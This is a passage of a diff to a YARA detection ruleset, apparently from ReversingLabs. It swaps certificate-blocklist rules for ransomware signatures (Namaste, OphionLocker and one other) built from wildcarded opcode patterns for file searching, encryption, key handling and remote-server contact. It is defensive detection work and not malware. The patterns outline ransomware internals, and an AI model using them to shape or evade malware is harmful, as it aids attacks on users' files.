+            0F B7 4C 24 ?? 0F B7 54 24 ?? 0F B7 44 24 ?? 68 ?? ?? ?? ?? 51 0F B7 4C 24 ?? 52 0F
+            B7 54 24 ?? 50 0F B7 44 24 ?? 51 52 50 55 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 FF 15 ?? ??
+            ?? ?? 8D 54 24 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 55 FF 15
+            ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5B 5E B8 ?? ?? ?? ?? 5D E8
+            ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$remote_server_1 = {
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 55 56 57 68 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 33 FF 57 6A ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 89 44 24 ?? 33 DB
+            BD ?? ?? ?? ?? 8B 44 24 ?? BA ?? ?? ?? ?? 8B CB D3 E2 85 D0 0F 84 ?? ?? ?? ?? 8A CB
+            8D 54 24 ?? 80 C1 ?? 52 88 4C 24 ?? 66 C7 44 24 ?? ?? ?? FF D6 83 F8 ?? 74 ?? 8D 44
+            24 ?? 50 FF D6 83 F8 ?? 75 ?? 8D 44 24 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 8D
+            50 ?? 8A 08 40 84 C9 75 ?? 2B C2 50 8D 4C 24 ?? 51 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 54
+            24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 83 F8 ?? 72 ?? 8B 44 24 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 43 83 FB ?? 0F 8C ?? ??
+            ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ??
+            ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 33 C0 5B E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2
+        }
+		$remote_server_2 = {
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 57 33 FF 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 89 84
+            24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 66 83 7C 24 ?? ??
+            0F 85 ?? ?? ?? ?? 66 83 7C 24 ?? ?? 0F 87 ?? ?? ?? ?? 53 55 56 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ??
+            8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 89 44 24 ?? 33 DB BD ?? ??
+            ?? ?? 8B CB B8 ?? ?? ?? ?? D3 E0 8B 4C 24 ?? 85 C1 0F 84 ?? ?? ?? ?? 8A D3 8D 44 24
+            ?? 80 C2 ?? 50 88 54 24 ?? 66 C7 44 24 ?? ?? ?? FF D6 83 F8 ?? 74 ?? 8D 4C 24 ?? 51
+            FF D6 83 F8 ?? 75 ?? 8D 44 24 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 8D 50 ?? 8A
+            08 40 84 C9 75 ?? 2B C2 50 8D 54 24 ?? 52 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 6A
+            ?? 50 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 83 F8 ?? 72 ?? 8B 4C 24 ?? 51 E8 ?? ?? ??
+            ?? 83 C4 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 43 83 FB ?? 0F 8C ?? ?? ?? ?? E8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B
+            8C 24 ?? ?? ?? ?? 5E 5D 5B 33 C0 5F E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2 ?? ?? 57 FF
+            15
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Porral Twinware S.L.L." and pe.signatures [ i ] . serial == "09:4b:f1:9d:50:9d:30:74:91:39:95:16:0b:19:5b:6c" and 1373241599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $file_search_p* ) ) and ( ( ( $encrypt_file_1 ) and ( $remote_server_1 ) ) or ( ( $encrypt_file_2 ) and ( $remote_server_2 ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0A77Cf3Ba49B64E6Cbe5Fb4A6A6Aacc6 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Namaste : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Namaste ransomware."
 		author = "ReversingLabs"
-		id = "4fb06917-ccbd-514c-a936-e337c31c6e65"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "e85d7ec3-367b-5bde-a570-8caa1f6cd61b"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L459-L475"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Namaste.yara#L1-L81"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3bebc4a36b57526505167d8f075d468e4775d66c81ce08644c506d9be94efba0"
+		logic_hash = "5a952276f41b5524bcb82a9ceb076983d2faf2864b3bbd0a06d49bbd5edc1e0e"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Namaste"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "I.ST.SAN. Srl" and pe.signatures [ i ] . serial == "0a:77:cf:3b:a4:9b:64:e6:cb:e5:fb:4a:6a:6a:ac:c6" and 1371081599 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_1F4C22Da1107D20C1Eda04569D58E573 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "4ff75d18-926e-51aa-8e1c-b9699669bbd0"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L477-L493"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fe19c4b21c3b70ec571461ca6d9c370a971c01f2d68e3c3916aa1fa0f13b20f8"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 02 06 07 9A 28 ?? ?? ?? ?? 07 17 58 0B 07 06 8E 69 32
+            ?? DE ?? 26 DE ?? 00 03 28 ?? ?? ?? ?? 0C 16 0D 2B ?? 08 09 9A 13 ?? 02 11 ?? 28 ?? ??
+            ?? ?? 17 28 ?? ?? ?? ?? 09 17 58 0D 09 08 8E 69 32 ?? DE ?? 26 DE ?? 2A
+        }
+		$find_files_p2 = {
+            02 7B ?? ?? ?? ?? 2D ?? 03 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 17 2A 03 6F ?? ?? ?? ??
+            0A 06 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06
+            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ??
+            ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06
+            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 16 2A 02 7B ?? ?? ?? ?? 2C ?? 03 72 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 16 2A 02 7B ?? ?? ?? ?? 2D ?? 03 72 ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 2D ?? 16 2A 03 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 03 73 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            20 ?? ?? ?? ?? 6A 31 ?? 16 0C DE ?? DE ?? 26 DE ?? 02 28 ?? ?? ?? ?? 07 28 ?? ?? ?? ??
+            2A 08 2A
+        }
+		$encrypt_files_p1 = {
+            02 03 28 ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 2C ?? 02 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            02 7B ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2B ?? 02 03 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 02 7B ?? ?? ?? ?? 2C ?? 03 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 2C ?? 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2A
+        }
+		$encrypt_files_p2 = {
+            1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 02 20 ?? ?? ??
+            ?? 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
+            ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1B 28 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1F
+            ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 12 ?? 28 ?? ?? ?? ?? 0B 02 07
+            28 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            DC 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A
+        }
+		$encrypt_files_p3 = {
+            28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 26 73 ?? ?? ?? ?? 0A 06 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            06 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 18 6F ?? ?? ?? ?? 04 14 73 ?? ?? ?? ?? 0B 06 07 06
+            6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 07 06 6F ?? ?? ?? ?? 1E 5B 6F ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 06 1A 6F ?? ?? ?? ?? 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 73 ??
+            ?? ?? ?? 0C 08 06 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 0D 03 19 73 ?? ?? ?? ?? 13 ?? 20 ??
+            ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 2B ?? 09 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11
+            ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 30 ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 09
+            2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 03 28 ?? ?? ?? ?? 2A
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PlanView, Inc." and pe.signatures [ i ] . serial == "1f:4c:22:da:11:07:d2:0c:1e:da:04:56:9d:58:e5:73" and 1366156799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4Fe68D48634893D18De040D8F1C289D2 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Ophionlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects OphionLocker ransomware."
 		author = "ReversingLabs"
-		id = "40aed582-2960-5b42-acde-7350a2595b4b"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "75335749-66bd-539e-92b3-dd92c0b332d8"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L495-L511"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.OphionLocker.yara#L1-L105"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "41feebc8800a084ac369b5c5721b1362d371bd503b67823986bad2839157a4b0"
+		logic_hash = "3c54a948a6a45ec5f5bc32fbbdbc8822f402b1332e9109b20b90635464dbe2ac"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "OphionLocker"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xinghua Yile Network Tech Co.,Ltd." and pe.signatures [ i ] . serial == "4f:e6:8d:48:63:48:93:d1:8d:e0:40:d8:f1:c2:89:d2" and 1371081600 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_6767Def972D6Ea702D8C8A53Af1832D3 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "c60497b4-5abe-52b0-aac9-88953ea6cdf1"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L513-L529"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "aa7f997449b4b8dcf488cfb7f45ee98ca540d39fb861f5b01ff4bb4aa1875b72"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$ol_do_filetypes_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 56 57 33 DB 53 89 5D ?? 53 89 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 89 45 ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+        }
+		$ol_do_filetypes_2 = {
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            C6 45 ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? FF 75 ?? 8D 4D ?? 89 5D ?? 50
+            8D 85 ?? ?? ?? ?? 89 5D ?? 50 53 89 5D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8
+            ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 89 65 ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 8D 75 ?? 50 E8 ?? ??
+            ?? ?? 8B CE C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 58 89 45 ?? 89 5D ?? 88 5D ?? 89 45 ?? 89
+            5D ?? 88 5D ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 8B 39 E9 00 01 00 00 8B 77 ??
+            8D 47 ?? 89 45 ?? 3B 77 ?? 0F 84 EC 00 00 00 8B F8 68 ?? ?? ?? ?? 8B D7 8D 4D ?? E8 ?? ?? ?? ?? 56 8B D0 C6 45 ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 50 8D 4D ?? E8 ?? ?? ?? ?? 53 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 6A ?? 8D 4D
+        }
+		$ol_do_filetypes_3 = {
+            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 89 65 ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ??
+            89 65 ?? 8D 45 ?? 83 EC ?? 8B CC 50 E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
+            81 C4 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 53 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 89 65 ?? 50 E8 ??
+            ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C6 ?? 83 C4 ?? 3B 77 ?? 0F
+            85 1C FF FF FF 8B 4D ?? 8B 7D ?? 8B 3F 89 7D ?? 3B F9 0F 85 F5 FE FF FF 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45
+            ?? ?? 8D 85 ?? ?? ?? ?? 89 65 ?? 8B CC BA ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC E8 ?? ?? ?? ?? C6 45
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 8B CC 89 65 ?? BA ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B
+            CC E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 33 F6 8D 8D
+            ?? ?? ?? ?? 53 46 56 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 53 56 8D 4D ?? E8 ?? ?? ?? ?? 53 56 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 53 56 8D 4D ?? E8 ?? ??
+            ?? ?? 8B 4D ?? 5F 5E 64 89 0D ?? ?? ?? ?? 5B 8B E5 5D C3
+        }
+		$ol_ecies_key_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 56 57 8B F9 33 DB 89 5D ?? 8D 8D ?? ?? ?? ?? 89 7D ?? 89 5D ?? E8 ??
+            ?? ?? ?? 33 F6 8D 85 ?? ?? ?? ?? 46 8D 8D ?? ?? ?? ?? 50 BA ?? ?? ?? ?? 89 75 ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B
+            CC 8B D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 56 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ??
+            ?? ?? BE ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 50 56 FF 75 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 85 C0 0F 85 40 03 00 00 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 50 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 51
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 8B B4 05 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 50 ?? 50 8B 85 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 C8 FF 56 ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 50 ?? 8D 55 ?? 8B C8 E8 ?? ?? ?? ?? 53 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? BB ??
+            ?? ?? ?? 8D 4D ?? 53 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 50 ?? 83 7D ?? ?? 8D 4D ?? 8B F0
+            0F 43 4D ?? 51 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 95 ?? ?? ?? ?? 8B 06 52 8B 48 ?? 03 CE 8B 01 FF 50 ??
+            C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 85 C9 74 0D 8B 01 6A ?? 8B 40 ?? 03 C8 8B 01 FF 10 33 F6 C6 45 ?? ?? 56 6A ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 83 EC ?? 8B CC 53 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
+        }
+		$ol_ecies_key_2 = {
